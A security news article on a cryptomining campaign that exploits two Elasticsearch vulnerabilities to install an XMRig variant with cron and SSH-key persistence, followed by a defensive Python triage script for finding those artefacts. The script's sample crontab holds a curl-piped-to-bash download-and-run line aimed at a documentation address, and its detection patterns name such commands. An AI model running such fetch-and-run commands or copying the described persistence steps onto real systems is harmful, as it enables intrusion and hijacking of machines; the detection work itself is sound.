Actors pivot to other network devices from infected machines

Dec 12, 2018 21:34 GMT

A malware campaign that scans the Internet for exploitable Elasticsearch instances running on Linux machines was recently observed by both Trend Micro and ISC; in both cases the payload was a variant of the XMRig cryptocurrency miner.

"The attack was deployed by taking advantage of known vulnerabilities CVE-2015-1427, a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a vulnerability in the default configuration of Elasticsearch," said Trend Micro.

After the attackers gain the ability to run arbitrary commands on the compromised systems, they can "attempt to escalate the privileges or even pivot to other systems in order to compromise the network further."

After exploiting either vulnerability, the attackers run a series of shell commands that download and launch a Bash script named update.sh. The script first hunts down and kills competing miners already running on the host.

Next, the script establishes persistence by adding itself to the system's crontab to run every 10 minutes. Before doing so it wipes the existing crontab, so that the miners killed in the previous step are not restarted by their own scheduled jobs.

An XMRig variant is used to mine for crypto on compromised machines

The malicious Bash script also appends the attackers' SSH public key to the .authorized_keys file so they can later log in without a username/password combination. Oddly, whether by programming error or by design, the script subsequently removes the .authorized_keys file, undoing that back door.

To finish the infection, the script downloads the devtools binary (the XMRig coin miner variant) together with the config.json file holding the miner's configuration, and then wipes the system logs to remove traces of its activity.
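The persistence steps above leave two artefacts a responder can look for on a Linux host: a crontab that has been reset and now contains only a short-interval download-and-run job, and an SSH key in authorized_keys that nobody on the team recognises. The following triage script is an added example written for this page; it is not Trend Micro's analysis code and not the campaign's update.sh. The crontab and authorized_keys samples are constructed, and the 198.51.100.7 address is taken from the TEST-NET-2 documentation range.

```python
"""Triage helpers for the cron and SSH-key persistence described above.

Added example for this page, not Trend Micro's code and not the campaign's
update.sh. Every sample input below is constructed; 198.51.100.7 is a
documentation (TEST-NET-2) address.
"""
import base64
import hashlib
import re
from typing import List, Set, Tuple

# A "*/N * * * *" schedule (every N minutes); the article reports N = 10.
_EVERY_N_MIN = re.compile(r"^\*/(\d+)\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
# Download-and-execute shapes: "curl ... | sh", "wget ... | bash",
# or a direct "sh .../update.sh" invocation.
_FETCH_EXEC = re.compile(
    r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b|\b(?:ba)?sh\b\s+\S*update\.sh\b")
# Crontab lines that are settings (MAILTO=..., PATH=...), not jobs.
_ASSIGNMENT = re.compile(r"^\w+=")


def suspicious_cron_entries(crontab: str, max_minutes: int = 15) -> List[dict]:
    """Return cron jobs that fire at least every `max_minutes` minutes and
    fetch or execute a script, i.e. the shape of the miner's persistence job."""
    hits = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or _ASSIGNMENT.match(line):
            continue
        m = _EVERY_N_MIN.match(line)
        if not m:
            continue
        interval, command = int(m.group(1)), m.group(2)
        if interval <= max_minutes and _FETCH_EXEC.search(command):
            hits.append({"interval_min": interval, "command": command})
    return hits


def cron_fully_replaced(crontab: str) -> bool:
    """True when every job in the crontab is suspicious: the wrapper script
    resets the crontab before adding its own entry, so a crontab holding
    nothing but the fetch-and-run job is itself an indicator."""
    jobs = [l for l in (x.strip() for x in crontab.splitlines())
            if l and not l.startswith("#") and not _ASSIGNMENT.match(l)]
    return bool(jobs) and len(jobs) == len(suspicious_cron_entries(crontab))


def ssh_key_fingerprint(authorized_keys_line: str) -> str:
    """OpenSSH-style SHA256 fingerprint ("SHA256:<base64, no padding>") of one
    authorized_keys line. Leading options are skipped by locating the key-type
    field; options containing quoted spaces are not handled here."""
    fields = authorized_keys_line.split()
    for i, field in enumerate(fields):
        if field.startswith(("ssh-", "ecdsa-")):
            blob = base64.b64decode(fields[i + 1])
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("no key material in line: " + authorized_keys_line)


def unknown_ssh_keys(authorized_keys: str, trusted: Set[str]) -> List[Tuple[str, str]]:
    """Return (fingerprint, last field) for every key whose fingerprint is not
    in the trusted set; the last field is the key comment when one is present."""
    unknown = []
    for raw in authorized_keys.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fp = ssh_key_fingerprint(line)
        if fp not in trusted:
            unknown.append((fp, line.split()[-1]))
    return unknown


# --- constructed sample inputs --------------------------------------------
INFECTED_CRONTAB = """\
# constructed: crontab after the wrapper script reset it and re-added itself
*/10 * * * * curl -fsSL http://198.51.100.7/update.sh | bash
"""
BENIGN_CRONTAB = """\
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/collect_metrics.sh
"""


def _key_line(key_type: str, blob: bytes, comment: str) -> str:
    """Build a syntactically valid authorized_keys line from a constructed blob."""
    return f"{key_type} {base64.b64encode(blob).decode()} {comment}"


AUTHORIZED_KEYS = "\n".join([
    _key_line("ssh-ed25519", b"constructed admin key blob", "admin@workstation"),
    _key_line("ssh-rsa", b"constructed attacker key blob", "attacker-added"),
]) + "\n"
ADMIN_FINGERPRINT = ssh_key_fingerprint(AUTHORIZED_KEYS.splitlines()[0])

if __name__ == "__main__":
    for hit in suspicious_cron_entries(INFECTED_CRONTAB):
        print(f"cron every {hit['interval_min']} min: {hit['command']}")
    print("crontab fully replaced:", cron_fully_replaced(INFECTED_CRONTAB))
    for fp, comment in unknown_ssh_keys(AUTHORIZED_KEYS, {ADMIN_FINGERPRINT}):
        print(f"unknown SSH key {fp} ({comment})")
```

On a real host, feed `crontab -l -u <user>` output (and the files under /etc/cron.d) to `suspicious_cron_entries`, and compare each user's authorized_keys against a baseline of fingerprints taken before the incident. Because the script in this campaign also deletes the key file it just wrote, a missing or recently truncated authorized_keys file, like the wiped logs, is as telling as an extra key.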

Moreover, the same miner had previously been spotted on endpoints around the world, in locations ranging from China and Taiwan to the United States.

"Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. The coding style is very similar to hacking tools, and parts of the code were also spotted in an Xbash-related case before," concluded Trend Micro.
